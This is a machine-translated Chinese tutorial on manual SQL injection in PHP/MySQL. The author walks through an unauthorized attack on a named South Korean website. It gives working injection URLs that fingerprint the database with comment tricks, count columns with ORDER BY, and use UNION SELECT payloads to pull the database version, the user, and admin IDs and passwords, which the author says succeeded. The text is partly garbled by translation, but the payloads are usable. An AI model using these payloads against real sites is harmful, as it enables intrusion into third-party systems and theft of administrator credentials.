Learn PHP manual injection with me

Author: Ice origin [L.S. T]

After reading so many ASP injections, are you tired of ASP injection? Well, never get tired of it. Only continuous learning will never be left far away by others! So today I will learn about manual injection in the PHP environment.
Today's website is a South Korean site. I have already found the injection point. If you are afraid of trouble, you can find the injection point by using ah d, in fact, ah d can not only find injection points in the ASP environment, but also PHP, ASPX, and JSP can all be found. You can refer to the screenshot below, 1. in fact, it is very easy for ah d to find the injection point, but the next thing should be done by our own hands. back to the text, we should first determine whether the database is using mysql and enter/* at the injection point. If the database returns normally, it indicates that it is mysql, because mysql Data supports/* comments. 2. The correct page is returned. Then, we have to determine the mysql version. If union queries are supported, this would be much easier, enter the following statement at the injection point: and ord (mid (version (),)> 51/*, and return normal, 3 .. the database version is later than 4.0, that is, union query is supported. here, we 'd better determine the permission first. If it is root, the subsequent Elevation of Privilege will be much easier. We submit: ord (mid (user )) = 114/*. An error is returned, indicating that it is not the root permission and can only be honestly guessed. well, Let's guess the number of fields. by adding a number after order by, we can quickly guess the number of fields. For example, I submitted: http://www.xx.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5 Order by 10, return normal, indicating that the number of fields is greater than 10, 4, continue to guess, and then submit http://www.xx.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5 Order by 20, error returned, 5, indicating that the number of fields is less than 20, then it is hard to work, when we submit http://www.xx.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5 Order by 17 is normal, while http://www.xx.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5 If order by 18 is incorrect, it indicates that the number of fields is 17, and you have to guess the column name. We submit: http://www.lifeloan.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5%20%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/ * 6. Replace the number displayed on the webpage with our statement. We will continue to submit the statement, http://www.lifeloan.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5%20%20and%201=2%20union%20select%201,2,3,4,version (), User (), 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17/*, 7, the version number and of course the database user name appear, and then the guess table is displayed, first, we thought of the admin table. Continue to submit: http://www.lifeloan.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5%20%20and%201=2%20union%20select%201,2,3,4,version (), User (), 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17% 20 from % 20 admin/*, indicating that the admin table exists, next, we have to guess the user name and password and submit it: http://www.lifeloan.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5%20%20and%201=2%20union%20select%201,2,3,4,version (), User (), username, from % 20 admin/* returned error. It seems that the username column name does not exist, the next step is a long process of guessing, but I never guessed the user name, But I guessed the ID and password. The statement I submitted is as follows: http://www.lifeloan.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5%20%20and%201=2%20union%20select%201,2,3,4,version (), User (), id, passwd, 9, 10, 11, 12, 13, 14, 15, 16, 17% 20 from % 20 admin/*, haha, burst out, 8
The article is about to end here. In fact, it is only a matter of this process. There is no violent user name, And the backend is not found, so we can only put it in one place! However, if you want to learn something from this literature, this article will have its value!